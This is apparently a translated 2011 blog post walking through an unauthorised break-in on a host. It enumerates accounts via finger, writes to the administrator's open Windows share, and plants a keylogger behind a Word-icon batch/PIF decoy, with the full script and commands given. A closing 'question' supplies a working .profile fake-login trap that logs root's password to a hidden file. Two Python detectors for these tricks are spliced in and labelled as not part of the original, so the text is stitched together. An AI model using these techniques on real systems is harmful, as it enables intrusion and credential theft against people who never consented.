
Friday, 11 November 2011

A rather unusual way to break into a host

ru0chen@263.net

This time I want to talk about a rather unusual way of breaking into a host. I haven't seen this method in any book yet, so I really ought to patent it.

Once upon a time, I found a website and went about the usual intrusion routine. Good: its finger service was open, so I wrote a shell script that tried account names from aaa to zzz. (By the way, this is a pattern I have noticed online: the length of an account name is proportional to the strength of its password. If an account name is only two or three characters long, its password is usually simple too, and vice versa; let's call it Ruo's theorem.) Not one of those accounts existed, and I stopped guessing names. What drew me in were the ports it had open: it was running WWW, and I refused to believe it had no holes. I ran five different CGI and WWW scanners against it, three or four hundred known problems in all, and almost none of them were present. I give up, I'm impressed! There were a few hits, but I didn't know how to exploit them, so forget it. I circled the host a few more times, like a fox that has met a hedgehog: nowhere to bite.

Still, let's look at root's information: finger root@xxx.xxx.xxx
Login name: root                        In real life: system PRIVILEGED account
Directory: /                            Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.

root logs in often, and that 202.xx.xx.xx is the workstation he uses. Might something be visible from there?
net view \\202.xx.xx.xx
Shared resources at \\202.xx.xx.xx

Sharename                    Type   Comment

x
x
我的公文包 (My Briefcase)     Disk
The command was completed successfully.

Leaving the Windows "File and Printer Sharing" service enabled on a machine connected to the Internet is something many people take lightly, and this root was no exception. It would have been nice if the C: drive were shared and writable, but that was a dream: none of the shared directories was a drive root, not even D:. No hurry, take it slowly. The folders I have marked x were useless: not writable, and full of English-language books (this root is quite something). "My Briefcase" caught my attention. Briefcase is a tool for synchronising files between different machines, so obviously this root updates the home page on the host regularly, sometimes editing it on his own machine and sometimes on the host... Hence a very important point: a shared "My Briefcase" is generally writable!
So let me go in and have a look.
>net use i: \\202.xx.xx.xx\我的公文包
>i:
>echo asdf>temp.txt
Good, it really is writable.
>del temp.txt
Leave no trace; a hacker's habit.
>dir /od /p
Let's see what's in there... What is that in the second-to-last row? "X月工作计划.doc" (the work plan for month X)! That's it. Since it is a plan, he won't just write it and toss it aside; he will surely open it again, at the very least to copy it when writing next month's plan :->
Time to act. My goal is to make him fall into my trap and run my hidden Trojan the next time he opens that file. This time I used a keystroke logger called HOOKDUMP. I think it's pretty good: reasonable price, generous quantity... sorry, force of habit. What I mean is that it not only records every keystroke but also logs which programs were opened or closed, which buttons were pressed, which menus were used... in short, its log is as detailed as if you were standing behind him watching him operate the computer. You may ask why, with so many Trojans around, I install this one. Because whether it is China's 冰河 (Glacier) and netspy or the foreign netbus and BO, they are all the number one target of every antivirus product, and could a root's machine possibly have no antivirus installed? HOOKDUMP is better: small and inconspicuous. Though if everyone starts using it, I'm afraid my chances of using it again will shrink...
>copy hookdump.* i:
One more thing: before uploading, prepare its hookdump.ini so that it runs hidden; otherwise a big window popping up on the screen the moment root runs it would be awfully embarrassing.
Then, on my own machine, create a BAT file with the same name, X月工作计划.BAT:
>edit c:\X月工作计划.BAT
@echo off
rem start the keylogger first (hookdump.ini makes it run hidden)
hookdump
rem unhide the real document and open it in Word so nothing looks wrong
attrib -h X月工作计划.doc
c:\progra~1\micros~1\office\winword X月工作计划.doc
rem remove the decoy: unhide the batch file, then delete the PIF and the batch file itself
attrib -h X月工作计划.bat
del X月工作计划.pif
del X月工作计划.bat
Got it? When root runs this BAT file it first runs the Trojan, then calls WINWORD to open the file he actually wanted, and then deletes itself. Perhaps WINWORD is in a different location on his machine and the call fails; that doesn't matter, the BAT file deletes itself immediately anyway, and he will assume it was his own mis-click.
Now the root of your C: drive holds this BAT file, with a square icon that looks nothing like a Word document. How would root ever run it? No problem: right-click the file, choose Properties, and in the "Program" tab click "Change Icon". The Word icon is on your machine under c:\progra~1\micros~1\offic. Also set "Run" to "Minimized" and tick "Close on exit", so that there is not the slightest sign when it runs. In fact this turns the one BAT file into two: a PIF file now exists alongside it, and that is what carries the icon.
Upload both files:
>copy X月工作计划.bat i:
>copy X月工作计划.pif i:
Then hide both his file and mine:
>attrib +h X月工作计划.doc
>attrib +h X月工作计划.bat
Now root's "Briefcase" shows only a single Word icon, identical to the original one; he would never dream it has become a BAT file. Now we can catch our breath and wait quietly...
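As an added example (not code from the original post), here is a small Python check that a defender, or the owner of the share, could run against the output of the Windows `attrib` command to spot exactly this setup: a document that has been hidden while a same-named .bat and .pif sit beside it. The `attrib` listing and file names below are constructed for the example; the parser relies only on `attrib` printing its attribute letters before the full path.

```python
import ntpath
from collections import defaultdict

# Extensions that execute when double-clicked versus ones that only open a viewer.
LAUNCHER_EXTS = {".bat", ".cmd", ".pif", ".exe", ".com", ".lnk", ".scr", ".vbs"}
DOCUMENT_EXTS = {".doc", ".xls", ".ppt", ".rtf", ".txt", ".pdf"}

# Constructed `attrib` output for the share, as it would look after the steps above.
SAMPLE_ATTRIB = r"""
A    H       I:\X月工作计划.doc
A    H       I:\X月工作计划.bat
A            I:\X月工作计划.pif
A            I:\hookdump.exe
A            I:\hookdump.ini
A            I:\notes.txt
"""


def parse_attrib(output):
    """Turn `attrib` output into (filename, is_hidden) pairs.

    attrib prints the attribute letters (A, S, H, R ...) in fixed columns and
    then the full path, so everything before the drive's ':\\' is the flag area.
    """
    entries = []
    for line in output.splitlines():
        pos = line.find(":\\")
        if pos < 1:
            continue  # blank line or something that is not a path
        flags, path = line[:pos - 1], line[pos - 1:].strip()
        entries.append((ntpath.basename(path), "H" in flags.upper()))
    return entries


def find_shadowed_documents(entries):
    """Group files by stem and report stems that have both a document and a
    launcher; a hidden document next to a visible launcher is the decoy pattern."""
    by_stem = defaultdict(lambda: {"documents": [], "launchers": [], "hidden_document": False})
    for name, hidden in entries:
        stem, ext = ntpath.splitext(name)
        ext = ext.lower()
        if ext in DOCUMENT_EXTS:
            by_stem[stem]["documents"].append(name)
            by_stem[stem]["hidden_document"] = by_stem[stem]["hidden_document"] or hidden
        elif ext in LAUNCHER_EXTS:
            by_stem[stem]["launchers"].append(name)
    return {stem: info for stem, info in by_stem.items()
            if info["documents"] and info["launchers"]}


if __name__ == "__main__":
    for stem, info in find_shadowed_documents(parse_attrib(SAMPLE_ATTRIB)).items():
        print(f"{stem}: document {info['documents']} (hidden={info['hidden_document']}) "
              f"shadowed by {info['launchers']}")
```

Run it with `attrib /s` output piped into `SAMPLE_ATTRIB`'s place; a stem reported with `hidden_document` True and a .pif or .bat launcher is the Briefcase trick as described, and hookdump.* sitting in the same folder is the payload it launches.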


A few days later I went into the workstation, retrieved the recorded keystrokes, found root's password, and logged in to the host.

Understood? This intrusion method does not charge head-on at an impregnable host; instead it goes after the machine used by the root who operates that host, his "daily driver". What he wants there is comfort, so its security is far weaker. Once inside his daily driver, track what he does, and don't the keys come easily? By the way, the "My Briefcase" share actually had a password on it, and I went through some extra trouble to get in; but that has nothing to do with the intrusion method, and I will cover how to get into password-protected shares another time.

OK, considering my fingers have gone numb from typing, you should now answer a question for me:
Condition: you already have a root shell on some host, say a setuid binary named .fool (-rwsr-xr-x 1 root system 131072 .fool)
Goal: obtain the root account's password on that host. Hints. Method one: since you are already root, you can install a sniffer and sniff passwords, but the host runs Digital UNIX 4.0B and the common esniff, dsniff and sniffit won't run on it; can you recommend another?
Method two: write a fake LOGIN shell, rename the original login program, and after collecting the account password call the real login; but I found that once renamed, the login program no longer runs!
Method three: modify the .profile in root's home directory as follows:
clear
echo
echo
echo "Digital UNIX (lwh000) (ttyp0)"
echo
echo "login:root"
echo "Password:"
echo "Login incorrect"
echo "login:\c"
read lgin
stty -echo
echo "Password:\c"
read pw
stty echo
echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk
echo
echo "Last login: Tue Jul 18 11:05:25 from pa1002"
echo
echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000"
# The middle part is too long to write out; it is just a copy of the host's welcome banner
echo
echo
# From here on is root's original .profile
PATH=$HOME/bin:${PATH:-/usr/bin:.}
export PATH
if [ ! "$DT" ]; then
stty dec
tset -I -Q
fi
See it? After root has actually logged in successfully, the first line, clear, wipes the banner; then a fake "login failed" is printed so that he types his credentials again; these are recorded; then the fake banner is printed and the normal .profile contents are executed.
But telnet is slow to respond, and however fast that clear is, the screen visibly flickers. A careful root might notice. It would be better if the UNIX banner could be switched off; how?
Of course, as long as the goal is reached you are welcome to propose your own method; don't be confined to the ones I thought of.
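Added example, not part of the original post: a Python audit of a shell start-up file that flags the fake-login trap from method three (a faked "Login incorrect", a prompt re-read with echo turned off, and the answer appended to a dotfile) and extracts where the captured credentials were written, which is what an incident responder needs first. The malicious sample is the .profile shown above and the benign sample is its original tail; both are embedded here as constructed strings.

```python
import re

# Constructed sample: the trap from the question above, trimmed to its essentials.
MALICIOUS_PROFILE = r'''clear
echo "Digital UNIX (lwh000) (ttyp0)"
echo "login:root"
echo "Password:"
echo "Login incorrect"
echo "login:\c"
read lgin
stty -echo
echo "Password:\c"
read pw
stty echo
echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk
PATH=$HOME/bin:${PATH:-/usr/bin:.}
export PATH
'''

# Constructed sample: what root's .profile looked like before it was tampered with.
BENIGN_PROFILE = r'''PATH=$HOME/bin:${PATH:-/usr/bin:.}
export PATH
if [ ! "$DT" ]; then
stty dec
tset -I -Q
fi
'''

# Each rule is (name, regex). One hit alone is weak evidence; several together
# reproduce the shape of a credential trap and should be treated as one.
RULES = [
    ("fake_login_prompt", re.compile(r'echo\s+"?(login|Password):', re.I)),
    ("fake_login_failure", re.compile(r'Login incorrect', re.I)),
    ("silent_read", re.compile(r'stty\s+-echo\b')),
    ("read_into_variable", re.compile(r'^\s*read\s+\w+', re.M)),
    ("append_to_hidden_file", re.compile(r'>>\s*\S*/\.\w+')),
]


def audit_profile(text):
    """Return the names of every rule that matches, in rule order."""
    return [name for name, rx in RULES if rx.search(text)]


def is_credential_trap(text, threshold=3):
    """A start-up file matching at least `threshold` rules is treated as a trap."""
    return len(audit_profile(text)) >= threshold


def capture_paths(text):
    """Every file the start-up script appends to; for a trap, that is the drop file."""
    return re.findall(r'>>\s*(\S+)', text)


if __name__ == "__main__":
    for label, profile in (("malicious", MALICIOUS_PROFILE), ("benign", BENIGN_PROFILE)):
        print(label, audit_profile(profile), "trap" if is_credential_trap(profile) else "clean",
              capture_paths(profile))
```

To use it on a live system, feed it the contents of root's .profile (and .login, .cshrc or /etc/profile, which can be abused the same way) and compare the result against a known-good copy; the `clear` at the top of the trap is the flicker the text mentions, and `capture_paths` tells you which file to secure and which passwords to rotate.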
